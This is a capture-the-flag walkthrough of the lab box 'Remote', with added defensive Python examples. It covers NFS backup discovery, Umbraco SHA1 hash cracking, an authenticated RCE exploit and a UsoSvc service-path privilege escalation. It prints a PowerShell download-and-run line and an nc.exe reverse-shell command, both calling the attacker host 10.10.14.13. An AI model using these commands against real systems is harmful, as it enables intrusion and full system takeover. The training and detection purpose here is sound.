Remote

Name: Remote
Release Date: 21 Mar 2020
Retire Date: 05 Sep 2020
OS: Windows
Base Points: Easy - Retired [0]
enjloezz 00 days, 00 hours, 57 mins, 49 seconds
qtc 00 days, 01 hours, 04 mins, 46 seconds
Creator: mrb3n
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./Remote 10.10.10.180

$ nmap -sC -sV -Pn -p- -oA ./Remote 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 13:24 EDT
Nmap scan report for 10.10.10.180
Host is up (0.058s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m48s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-05T17:31:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 274.31 seconds


We've got FTP, HTTP, SMB, and a few others.  It looks like FTP allows anonymous login, but I'll save you some time and tell you that there are no files there we can play with.  My guess this early into the box is that we'll need to PUT something there rather than GET something.  So, let's check out the HTTP service, which is a Looney Tunes "Acme Products" page.  Fire up gobuster and see what's behind the scenes.

$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.180
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.180
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/05 13:30:06 Starting gobuster
===============================================================
/1111 (Status: 200)
/Home (Status: 200)
/Blog (Status: 200)
/Products (Status: 200)
/People (Status: 200)
/blog (Status: 200)
/contact (Status: 200)
/home (Status: 200)
/install (Status: 302)
/intranet (Status: 200)
/people (Status: 200)
/person (Status: 200)
/products (Status: 200)
/umbraco (Status: 200)
===============================================================
2020/09/05 13:36:11 Finished
===============================================================


OK, gobuster is throwing a LOT of header errors and timeouts, but if you yank those out (the full list is in the CTB file), you'll notice an umbraco folder, meaning this site is using Umbraco as its CMS.  Unfortunately for us, all the traditional default credential combos fail, so this looks like it might be another dead end/rabbit hole, or we're missing a crucial piece of information needed to log in.  So, let's see if the SMB/NFS shares give us anything useful, because I've come up empty so far.

SMB is a bust without some credentials, but:


sudo showmount -e 10.10.10.180


gives us a /site_backups (everyone) listing.  FINALLY, we're getting somewhere.  Let's mount that.  And yes, I know I oops'd the backups vs backup, but hey, nobody's perfect XD
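Here is an added example, not part of the original writeup, of the check a defender would run over showmount -e output to catch exactly this configuration: an export that every client can mount. The sample output is constructed; the /site_backups line is what this box reports, and the other two exports are invented to show cases that should and should not be flagged.

```python
import re

# Constructed sample in the shape `showmount -e <host>` prints. The first
# export is what this box reports; the other two are invented for contrast.
SAMPLE_SHOWMOUNT = """\
Export list for 10.10.10.180:
/site_backups (everyone)
/srv/data     10.0.0.0/24,10.0.1.5
/srv/public   *
"""

EXPORT_LINE = re.compile(r"^(\S+)\s+(.+)$")


def parse_exports(text):
    """Map each export path to the list of clients allowed to mount it."""
    exports = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list"):
            continue
        m = EXPORT_LINE.match(line)
        if not m:
            continue
        path, clients = m.groups()
        # This box prints "(everyone)" for an unrestricted export; Linux
        # servers print "*". Strip the parentheses so both compare the same.
        exports[path] = [c.strip() for c in clients.strip("()").split(",")]
    return exports


def world_readable_exports(exports):
    """Exports that any host on the network can mount."""
    return sorted(path for path, clients in exports.items()
                  if any(c in ("everyone", "*") for c in clients))


if __name__ == "__main__":
    exports = parse_exports(SAMPLE_SHOWMOUNT)
    for path in world_readable_exports(exports):
        print(f"WARNING: {path} is exported to every client")
```

Run against real output, any path it prints is one that a backup, config file or database copy must never be placed in without a client restriction on the export.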

Digging through all that backup data, plus a little bit of Google Fu, we discover that the admin credentials are stored in the Umbraco.sdf file.  That file is located at site_backup/App_Data/Umbraco.sdf.  Don't bother cat'ting it; try running strings on it instead.  The strings output is readable, but there are WAY too many lines to dig through.  So, how do we filter it down?  grep is always your friend.

$ strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" 192.168.195.1User "admin" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating Key, IsApproved, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "smith" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Name, Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Username, Email, Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "ssmith" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" 192.168.195.1umbraco/user/sign-in/failedlogin failed
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
adminAdministratorsCADMOSKTPIURZ:5F7
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating TourData, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate

And as much as I despise Christmas music, I'm singing Do You See What I See.


adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50

I need the hash portion of that record: b8be16afba8c314ad33d812f22a04991b90e2aaa.  Then we can bust it open with ol' John.


So, use vi, nano, echo, or however you like to get that hash into a file you can feed to john.  I use vi.  Then:


john hash --format=RAW-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt


and you get baconandcheese as the password.  ummmmmm bacon...... Ok I'm back.

kali@kali:~/Desktop/remote$ vi hash
kali@kali:~/Desktop/remote$ sudo john hash --format=RAW-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for kali: 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   (?)
1g 0:00:00:00 DONE (2020-09-05 13:59) 1.449g/s 14237Kp/s 14237Kc/s 14237KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
kali@kali:~/Desktop/remote$ 
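As an added example (my code, not part of the writeup or of Umbraco), the following parses the strings dump above instead of eyeballing it: it recovers the user records by anchoring on the fixed-shape fields (the 40-hex hash, the hashAlgorithm JSON, the locale and the trailing GUID), pulls out the audit-trail lines, flags every account whose password is stored as a plain unsalted SHA1 digest, and confirms the cracked password by recomputing the hash, which is the same comparison john's Raw-SHA1 mode performs. The sample lines are copied from the output above; the field layout the regexes assume (name, login, hash, algorithm, email, locale, GUID) is inferred from those lines, not taken from Umbraco documentation.

```python
import hashlib
import re
from collections import Counter

# Sample lines copied from the strings output above. The SDF fields are run
# together with no separators, so the parser anchors on fixed-shape fields
# (the 40-hex hash, the hashAlgorithm JSON, the locale and the row GUID).
SAMPLE_STRINGS = """\
Administratoradmindefaulten-US
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
User "admin" 192.168.195.1User "smith" umbraco/user/password/changepassword change
User "admin" 192.168.195.1umbraco/user/sign-in/failedlogin failed
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
"""

GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
# name+login run together, hash, algorithm JSON, optional email, locale, GUID
# (layout inferred from the dump above, an assumption of this example)
USER_RECORD = re.compile(
    r'^(?P<prefix>.+?)(?P<hash>[0-9a-f]{40})'
    r'\{"hashAlgorithm":"(?P<alg>[^"]+)"\}'
    r'(?P<email>.*?)(?P<locale>[a-z]{2}-[A-Z]{2})(?P<guid>' + GUID + r')$')
# acting user, source IP, optional affected user, URL, then the event text
AUDIT_EVENT = re.compile(
    r'^User "(?P<actor>[^"]+)" (?P<ip>\d+(?:\.\d+){3})'
    r'(?:User "(?P<target>[^"]+)" )?(?P<url>umbraco/\S+?)'
    r'(?P<event>login success|logout success|login failed|password change|updating .*)$')


def parse_dump(text):
    """Split a strings dump into user records and audit events."""
    users, events = [], []
    for line in text.splitlines():
        m = USER_RECORD.match(line)
        if m:
            prefix, email = m["prefix"], m["email"]
            # The login is normally the email address, so it can be peeled off
            # the end of the run-together prefix; otherwise the split is unknown.
            if email and prefix.endswith(email):
                name, login = prefix[:-len(email)], email
            else:
                name, login = prefix, None
            users.append({"name": name, "login": login, "email": email or None,
                          "hash": m["hash"], "alg": m["alg"], "guid": m["guid"]})
            continue
        m = AUDIT_EVENT.match(line)
        if m:
            events.append(m.groupdict())
    return users, events


def weak_hash_users(users):
    """Records whose hash is a bare SHA1 digest with no salt: an offline
    wordlist run against them is cheap, which is what the writeup does."""
    return [u for u in users if u["alg"].upper() == "SHA1"]


def check_candidate(stored_hex, candidate):
    """True if `candidate` hashes to the stored unsalted SHA1 value."""
    return hashlib.sha1(candidate.encode()).hexdigest() == stored_hex.lower()


def event_summary(events):
    """Count events per (actor, affected user, event) to spot odd activity,
    e.g. repeated failed logins or password changes from one address."""
    return Counter((e["actor"], e["target"] or "-", e["event"]) for e in events)


if __name__ == "__main__":
    users, events = parse_dump(SAMPLE_STRINGS)
    for u in weak_hash_users(users):
        print(f"unsalted SHA1 hash for {u['login'] or u['name']}: {u['hash']}")
    print(check_candidate(users[-1]["hash"], "baconandcheese"))
    for key, n in event_summary(events).items():
        print(n, key)
```

The point for a defender is the middle function: a backup that carries unsalted SHA1 hashes is as good as a plaintext password list once it leaves the server, so the backup share and the hash format are both findings, not just the credentials.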

Jump back to that Umbraco page and use admin@htb.local:baconandcheese as the credentials and you have yourself a foothold in the CMS.  I will fully admit that I know jack squat about Umbraco.  So, where do you go when you need help?  The HELP menu!  <These Dad jokes just keep getting worse. I should stop, but I'm irresistibly drawn to being a smartass>

Anyway, the Help menu shows us that the version running is 7.12.4, and searchsploit shows that 7.12.4 is vulnerable to an authenticated RCE exploit.

I tried several times to get that exploit to work and finally ended up using the one at:


wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py


Create or use a prebuilt PowerShell reverse shell one-liner.  I named mine powerreverse.ps1.  Eventually, I fired up nc -lvnp 4444


And then ran the exploit from noraj:


sudo python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.13/powerreverse.ps1')"


Finally, a shell.  It's a crap one, but it's there.  Now, let's look around.  The IIS AppPool account has an interesting ability to impersonate clients.  Let's check into that.

Now it gets complicated.  There appear to be multiple ways to privesc.  I'm going to start with UsoSvc because I remember seeing it on PayloadsAllTheThings.


So, here's the progression of the privesc.  Copy the nc.exe into your working folder.  It is located in /usr/share/windows-resources/binaries/nc.exe. 


  1. Invoke-WebRequest -Uri http://10.10.14.13/nc.exe -OutFile nc.exe
  2. sc.exe stop usosvc
  3. sc.exe config UsoSvc binpath= "C:\Users\Public\nc.exe 10.10.14.13 4445 -e cmd.exe"
  4. <Attacking machine> nc -lvnp 4445
  5. sc.exe start usosvc


Instantly, you will have an NT AUTHORITY\SYSTEM shell!  Move fast though; it doesn't last long.  Grab your flags and you're finished.
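From the defender's side, the step that matters in the sequence above is the binpath rewrite: sc.exe config stores the new path in the registry under HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc\ImagePath, so a registry-set event on that value (Sysmon Event ID 13) is the natural detection point. The following is an added example, not part of the writeup: it parses a few constructed Sysmon events written in a simplified key=value form and raises an alert when a service's ImagePath deviates from an assumed baseline or points into a user-writable directory. The baseline values and the log format are assumptions for the example.

```python
import re

# Expected ImagePath per service (assumed here; take real values from a
# known-good host, e.g. the BINARY_PATH_NAME line of `sc.exe qc <svc>`).
BASELINE = {
    "UsoSvc": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}

# Locations a standard user can write to: a service binary there is a red
# flag regardless of baseline.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\", "c:\\windows\\temp\\")

# Constructed Sysmon events in a simplified key=value form. The SCM
# (services.exe) performs the registry write on behalf of whoever ran
# sc.exe, so Image is services.exe rather than sc.exe.
SAMPLE_EVENTS = r"""
EventID=13 Image=C:\Windows\system32\services.exe TargetObject=HKLM\System\CurrentControlSet\Services\Spooler\ImagePath Details=C:\Windows\System32\spoolsv.exe
EventID=13 Image=C:\Windows\system32\services.exe TargetObject=HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath Details=C:\Users\Public\nc.exe 10.10.14.13 4445 -e cmd.exe
EventID=13 Image=C:\Windows\system32\services.exe TargetObject=HKLM\System\CurrentControlSet\Services\UsoSvc\Start Details=DWORD (0x00000003)
EventID=1 Image=C:\Windows\System32\sc.exe CommandLine=sc.exe stop usosvc
"""

IMAGEPATH_EVENT = re.compile(
    r"^EventID=13 Image=(?P<image>\S+) "
    r"TargetObject=(?P<key>\S*\\Services\\(?P<service>[^\\]+)\\ImagePath) "
    r"Details=(?P<value>.*)$", re.IGNORECASE)


def parse_imagepath_changes(text):
    """Keep only Event ID 13 records that set a service's ImagePath value."""
    return [m.groupdict() for m in map(IMAGEPATH_EVENT.match, text.splitlines()) if m]


def executable_of(image_path):
    """First token of an ImagePath, with surrounding quotes removed."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def alerts_for(changes, baseline=BASELINE):
    """Flag ImagePath writes that deviate from baseline or point at a
    user-writable directory; returns one alert per suspicious change."""
    alerts = []
    for c in changes:
        svc, value = c["service"], c["value"].strip()
        exe = executable_of(value).lower()
        reasons = []
        if svc in baseline and value.lower() != baseline[svc].lower():
            reasons.append("ImagePath differs from baseline")
        if any(exe.startswith(p) for p in USER_WRITABLE):
            reasons.append("service binary in a user-writable location")
        if reasons:
            alerts.append({"service": svc, "value": value, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in alerts_for(parse_imagepath_changes(SAMPLE_EVENTS)):
        print(f"ALERT {a['service']}: {a['value']!r} -> {'; '.join(a['reasons'])}")
```

The Start value change on the third line is deliberately ignored: stopping and starting a service is routine, it is the ImagePath that should never move away from its baseline on a server nobody is deploying to.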